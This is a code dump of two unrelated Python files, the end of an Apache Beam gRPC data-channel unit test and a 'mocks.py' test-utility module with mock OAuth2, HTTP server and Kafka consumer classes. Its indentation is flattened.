assert not thread.is_alive(), 'timed out after %s seconds' % timeout_secs
return wrapper
return decorate
class DataChannelTest(unittest.TestCase):
@timeout(5)
def test_grpc_data_channel(self):
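    # Stand up a real gRPC server on an ephemeral port, connect a client
    # channel to it, and run the bidirectional data-channel checks.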
data_channel_service = data_plane.GrpcServerDataChannel()
server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
data_channel_service, server)
test_port = server.add_insecure_port('[::]:0')
server.start()
data_channel_stub = beam_fn_api_pb2_grpc.BeamFnDataStub(
grpc.insecure_channel('localhost:%s' % test_port))
data_channel_client = data_plane.GrpcClientDataChannel(data_channel_stub)
try:
self._data_channel_test(data_channel_service, data_channel_client)
finally:
data_channel_client.close()
data_channel_service.close()
data_channel_client.wait()
data_channel_service.wait()
def test_in_memory_data_channel(self):
channel = data_plane.InMemoryDataChannel()
self._data_channel_test(channel, channel.inverse())
def _data_channel_test(self, server, client):
self._data_channel_test_one_direction(server, client)
self._data_channel_test_one_direction(client, server)
def _data_channel_test_one_direction(self, from_channel, to_channel):
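    # Write elements on from_channel's output streams and assert that they
    # arrive, grouped per instruction, via to_channel.input_elements().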
def send(instruction_id, target, data):
stream = from_channel.output_stream(instruction_id, target)
stream.write(data)
stream.close()
target_1 = beam_fn_api_pb2.Target(
primitive_transform_reference='1',
name='out')
target_2 = beam_fn_api_pb2.Target(
primitive_transform_reference='2',
name='out')
# Single write.
send('0', target_1, 'abc')
self.assertEqual(
list(to_channel.input_elements('0', [target_1])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='0',
target=target_1,
data='abc')])
# Multiple interleaved writes to multiple instructions.
target_2 = beam_fn_api_pb2.Target(
primitive_transform_reference='2',
name='out')
send('1', target_1, 'abc')
send('2', target_1, 'def')
self.assertEqual(
list(to_channel.input_elements('1', [target_1])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='1',
target=target_1,
data='abc')])
send('2', target_2, 'ghi')
self.assertEqual(
list(to_channel.input_elements('2', [target_1, target_2])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='2',
target=target_1,
data='def'),
beam_fn_api_pb2.Elements.Data(
instruction_reference='2',
target=target_2,
data='ghi')])
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
mocks.py
|
# Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Module with utilities to be used in unit tests
"""
import json
import re
import socket
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from unittest.mock import MagicMock, Mock
import requests
from django.utils.crypto import get_random_string
from kafka.structs import TopicPartition
class MockOAuth2Session(MagicMock):
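    # fetch_token returns a fake bearer token (or raises RAISES when it is
    # set); get/post cycle through the status codes or exceptions in RESPONSES.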
RESPONSES = []
RAISES = None
def __init__(self, *args, **kwargs):
super(MockOAuth2Session, self).__init__(*args, **kwargs)
self.token = None
self.fetch_token = Mock(side_effect=self._fetch_token)
self.get = Mock(side_effect=self._request)
self.post = Mock(side_effect=self._request)
self._get_counter = 0
def _fetch_token(self, **kwargs):
if self.RAISES is None:
self.token = {
'access_token': get_random_string(30),
'token_type': 'Bearer',
'expires_in': 36000,
'expires_at': time.time() + 36000,
'scope': ['read', 'write']
}
return self.token
else:
raise self.RAISES()
def _request(self, url, *args, **kwargs):
res = self.RESPONSES[self._get_counter % len(self.RESPONSES)]
self._get_counter += 1
if isinstance(res, Exception):
raise res
else:
response = Mock()
response.status_code = res
return response
class MockMessage(object):
def __init__(self, topic, value, offset, key=None, headers=None):
self.key = key
self.topic = topic
self.value = value
self.offset = offset
self.headers = headers if headers is not None else []
class MockRequestHandler(BaseHTTPRequestHandler):
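    # Minimal handler that answers POSTs to the OAuth2 token endpoint with a
    # canned bearer token; do_GET is left for subclasses to implement.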
OAUTH2_PATTERN = re.compile(r'/oauth2/token/')
OAUTH2_TOKEN = 'OUfprCnmdJbhYAIk8rGMex4UBLXyf3'
def _handle_oauth(self):
payload = {'access_token': self.OAUTH2_TOKEN,
'token_type': 'Bearer',
'expires_in': 1800,
'expires_at': time.time() + 1800,
'scope': ['read', 'write']}
status_code = 201
return payload, status_code
def do_POST(self):
if re.search(self.OAUTH2_PATTERN, self.path):
payload, status_code = self._handle_oauth()
self._send_response(payload, status_code)
return True
return False
def _path_match(self, path):
return re.search(path, self.path)
def _send_response(self, payload, status_code=requests.codes.ok):
self.send_response(status_code)
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
response = json.dumps(payload)
self.wfile.write(response.encode('utf-8'))
def _content_data(self):
length = int(self.headers['content-length'])
return self.rfile.read(length).decode('utf-8')
def _json_data(self):
return json.loads(self._content_data())
def do_GET(self):
raise NotImplementedError
    def log_message(self, *args, **kwargs): pass  # silence per-request logging during tests
class MockKafkaConsumer(object):
"""
Simulates a KafkaConsumer
"""
MESSAGES = []
FIRST = 0
END = 1
def __init__(self, *args, **kwargs):
super(MockKafkaConsumer, self).__init__()
self.counter = 0
def subscribe(self, topics):
self.topics = topics
def assignment(self):
return set([TopicPartition(topic, 0) for topic in self.topics])
def beginning_offsets(self, topics_partition):
return {topics_partition[0]: self.FIRST}
def end_offsets(self, topics_partition):
return {topics_partition[0]: self.END}
def seek(self, topics_partition, index):
self.counter = index
def __getattr__(self, item):
return MagicMock()
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
try:
m = self.MESSAGES[self.counter]
        except (IndexError, KeyError):
raise StopIteration
else:
self.counter += 1
return m
def get_free_port():
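    # Bind to port 0 so the OS picks a free port, then release the socket and
    # return that port number.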
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def start_mock_server(certs_dir, cls, port=None):
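    # Serve `cls` via HTTPServer on localhost in a daemon thread; shut it down
    # with stop_mock_server(). `certs_dir` is accepted but unused here.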
port = port or get_free_port()
mock_server = HTTPServer(('localhost', port), cls)
mock_server_thread = Thread(target=mock_server.serve_forever)
    mock_server_thread.daemon = True
mock_server_thread.start()
return mock_server_thread, mock_server
def stop_mock_server(mock_server_thread, mock_server):
mock_server.shutdown()
mock_server_thread.join()
|